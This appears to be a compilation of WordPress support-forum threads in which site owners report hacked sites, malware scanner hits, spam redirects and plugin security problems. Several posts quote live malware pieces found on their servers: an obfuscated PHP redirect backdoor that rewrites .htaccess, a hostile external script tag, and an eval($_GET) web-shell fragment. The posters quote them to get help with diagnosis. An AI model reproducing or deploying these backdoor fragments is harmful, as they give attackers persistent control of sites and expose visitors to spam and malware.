Hallo,
mein Hoster hat mir eine Nachricht geschickt und die Seite blockiert:
Folgende Datei wurde aufgrund von Malware/Angriffe zum Schutz der Systeme blockiert:
XXXX/wp-content/plugins/offen/templates/widget/style5.php
↧
Malware-Scan
↧
Having to reset permalinks due to 404 errors multiple times a day
Hey folks, hoping y’all might have some ideas on how to fix this. I had someone attack my website with a phished login back in december and post a phishing page. I deleted all the pages and malware by hand, and reset all passwords. No security issues since then. However, ever since then, my blog posts and pages have been breaking multiple times a day with the error
“Not Found
The requested URL /blog/ was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Resetting my permalinks fixes the problem, however it keeps occurring, sometimes multiple times a day. I’ve tried disabling all of my plugins and reverting my theme back to default 2019, that doesn’t work. I also tried resetting my .htaccess file, that also didn’t fix it.
My current .htaccess file is:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Use PHP70 as default
AddHandler application/x-httpd-php70 .php
<IfModule mod_suphp.c>
suPHP_ConfigPath /opt/php70/lib
</IfModule>
I’m currently running WordPress 5.3.2 with the Flatsome theme.
Help please! Pulling my hair out at this point!
↧
↧
Security Question: Why am I getting so much suspicious traffic?
Hello,
My Wordfence security plugin shows that there are IP’s blocked from all over the world. I have Godaddy, and multiple WordPress sites on one host. Some sites have multiple IP blocks per day, while others 1 every couple of days.
The IP’s usually either go for /wp-login.php, or /xmlrpc.php. Wordfence lists them as Human, and sometimes bot.
Is all of this normal? Does everyone get bombarded by malicious traffic, or what is this?
If I transfer my WordPress sites to a new host, or to wordpress.com, would these “attacks” continue? Or is my hosting somehow compromised?
I don’t really know much about security, so any info would be of great help!
Thank you for reading.
↧
Strange file
I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:
@ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
touch('.htaccess', $actime);
touch('wp-blog.php', $actime);
echo 'ok';
}
exit;
}
if (is_dir("wp-includes/Text/Diff/p")) {
$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";
$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
$redirect = 0;
$fof = '404 not found';
function getRealIpAddr() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];
if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";
if (ini_get('allow_url_fopen')) {
function get_data_ya($mmm) {
$data = file_get_contents($mmm);
return $data;
}
}There’s more, but this part looks like it’s doing something suspicious.
I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.
↧
One of a kind and safest life saver wordpress security
Million stars to the maker of this plugin. I recommend the whole world to use tgis plugin
↧
↧
Malware Found on Custom-admin-interface.php
Dear all
my provider has notified me that in the code below there’s a malware.
/plugins/wp-custom-admin-interface/wp-custom-admin-interface.php
{HEX}Malware.Expert.generic.eval.base64.decode.41.UNOFFICIAL FOUND
↧
Website hacked thanks to the poor code of this plugin
Website hacked thanks to the poor code of this plugin
Avoid this plugin at all costs if you don’t want your website to be hacked
↧
Malware because of InfiniteWP Client
Hi,
The communication of the security issue arrived too late for me. No mail or what so ever. One of my clients had to notify me. Quite awkward.
I have a couple of infected websites all on 1 server. Each time when i clean them up they get infected again within a couple of hours. Removing the malicious codes doesn’t seem to be enough. I’m missing some spots. But I have no idea where.
Why don’t you have any solution shared with us?! Can you give me a manual for how to clean up my websites/server?
Thanks!
↧
Can’t update from 5.3.10
Hi,
I’m having issues trying to update this plugin from 5.3.10 to 5.3.13.
The Plugin page prompts me that this plugin has an update, although each time I click “update now” it proceeds as normal and starts to update although once I refresh the page, it prompts me to update again. I’ve tried it 4 times now.
Any ideas? the admin-ajax.php isn’t throwing any errors, although it keeps trying to update to 5.3.10 which is rather strange.
{"success":true,"data":{"update":"plugin","slug":"miniorange-2-factor-authentication","oldVersion":"Version 5.3.10","newVersion":"Version 5.3.10","plugin":"miniorange-2-factor-authentication\/miniorange_2_factor_settings.php","pluginName":"miniOrange 2 Factor Authentication"}}
↧
↧
chr() expects parameter 1 to be int, string given
chr() expects parameter 1 to be int, string given 1 +
wp-content/plugins/wp-security-pro/handler/login.php:62
Getting this PHP Notice when activate the Plugin.
↧
Infected With Malicious Redirect Malware
I’m helping my friend, with his new website.
As victims of daily bruteforce, (before we had Cloudflare firewalls rules), his WP credentials were breached. Our wordpress was up-to-date but our PHP was not at the time.
The bot created new ‘pages’ that cannot be seen in the WordPress dashboard.
I accidentally ran across it via Googling: site:hypelist.ca
**Check now and you will see it’s littered with Italian spam redirects from pages show as 404 errors (according to https://sitecheck.sucuri.net/)
Disregard the ‘other’ malware (rogueads.unwanted.ads) They’re scripts from an ad network.
I’ve located some of the malware. In my root directory, I have a folder
called: postnew (last modified 1969-12-31 lol)
postnew contains:
1. idlogs.txt
2. index.php
3. moban.html
When I delete this file, it appears again after a few minutes.
.htaccess: Our .htcaccess file appears compromised as well because of the Rewrite rules that are directed to postnew/index.php
Once again, when I delete the rewrite rules related to the above, it appears again.
I’ve even deleted the .htaccess file and create a new one via wordpress dashboard, no luck.
XML-RPC seems normal, but is it supposed to include: http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html near the top?
I’ve deleted a few plugin I thought could be an issue. Persists.
I’ve searched wp-includes, but would take forever to potentially find anything.
****When I deleted the postnew folder, My wp-admin page broke. Looks like this
When I use /wp-login.php I looks fine, upon successful login, it leads to the broken /wp-admin page.
I know some may suggest backup and reinstall WordPress. I’ve heard other online still had the issue after a clean install.
My friend attracted the malware, but I played around and broke the site even further.
Any help would be appreciated.
*note I do not have access to WordPress dashboard. Only Cpanel, FTP & Cloudflare.
I will try to respond ASAP to move this along quickly.
Thanks in advance and for your time.
↧
Malware found ioptimize.php
Hello Folks,
We have found a malicious plugin on several WordPress sites on several webhosts.
The plugin is called ioptimization, and would allow file uploads when opened directly (/wp-content/plugins/ioptimization/IOptimize.php). Luckily Wordfence is blocking this in our cases.
It does not seem to be because of another plugin, as websites with different plugins had this infection and on different servers, so I’m afraid this is a WordPress Core exploit.
This malicious plugin appeared 4 days ago (8 Feb), all around the same time.
So far, the damage has been minimal, but it’s more worrying this appeared in our sites in the first place.
I hope I posted this in the right place.
[malware code removed]
Hope this will be useful to someone
↧
Malicious activity
Hello
I found this link 4 times in my home page source code <script src=”//mikkymax.com/20ba4519da0cfb915b.js” async=”” type=”text/javascript”></script> , I search about it in my server code it doesn’t existe there, whene I did some research I found that is a Malicious activity.
I used iThemes Security and Wordfence but any malware are detected.
Any help please?
↧
↧
Malicious activity not detected
Hello
I found this link 4 times in my home page source code <script src=”//mikkymax.com/20ba4519da0cfb915b.js” async=”” type=”text/javascript”></script> , I search about it in my server code it doesn’t existe there, whene I did some research I found that is a Malicious activity.
I Wordfence but any malware was detected.
Any help please?
↧
Unable to load/edit using Elementor
Hi. We’ve just installed the 14-day trial Security by CleanTalk plugin, and we can’t seem to be able to edit my pages using Elementor.
Furthermore, 3 of our Elementor-based pages have been flagged as “Frontend malware”: https://family.org.my/?page_id=2098, https://family.org.my/?page_id=4481, https://family.org.my/?page_id=7191.
As a result, we have disabled the plugin so we’re able to continue our work.
Appreciate your help to resolve this.
↧
一旦安装,无法停止,无法卸载
其实就是一个带引流广告的wp-proxy,而且装上了就无法停止,无法卸载
不知道是Bug,还是作者有意如此。
↧
WordPress installation redirects to ad/spam page
When you visit my site, unless you type the http:// it redirects to some spam site. I have used WordFence and scanned the site and installation, and it still does this. SUggestions? Help……..TIA
↧
↧
MALWARE INFECTED PLUGIN
My site got infected with malware through Content Views and Content Views Pro. It took me 3 days to fix my WordPress, now whenever I activate CVP my site breaks immediately.
this is the result of the malware scan
———– SCAN SUMMARY ———–
Known viruses: 2091091
Engine version: devel-clamav-0.99-beta1-632-g8a582c7
Scanned directories: 5615
Scanned files: 39596
Infected files: 19
Data scanned: 846.52 MB
Data read: 2107.50 MB (ratio 0.40:1)
Time: 899.292 sec (14 m 59 s)
———– SCAN SUMMARY ———–
Known viruses: 2091091
Engine version: devel-clamav-0.99-beta1-632-g8a582c7
Scanned directories: 0
Scanned files: 0
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 6.058 sec (0 m 6 s)
———– SCAN SUMMARY ———–
Known viruses: 2091091
Engine version: devel-clamav-0.99-beta1-632-g8a582c7
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 5.746 sec (0 m 5 s)
↧
Still have malware
Hello, I have 3 websites in my home directory and I run a full scan for https://myoffice-hub.com but https://sitecheck.sucuri.net/results/https/myoffice-hub.com says still have problems in my website.
And https://transparencyreport.google.com/safe-browsing/search?url=https:%2F%2Fmyoffice-hub.com says ‘No unsafe content found’. I am confused about different reports.
Can you please suggest me how to solve those errors?
Thanks
Gaurav Singh
↧
Malicious(?) code in plugin-generated php files
Hi,
I had some potentially malicious code in files like this(name changed):
wp-content/cache/supercache/www.example.org/meta-wp-cache-www.example.org12ef834fsaf32r23f43gsdf95.php
here is the sample:
@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(
@donncha has written some time ago that these PHP files are generated off the website. What kind of requests are they generated from? Are they error logs generated from debugging tab – there is a link to non-existing php file with hashed name?
I looked into other files and database and they seem clean. Is it possible that the plugin has cached a malicious request?
↧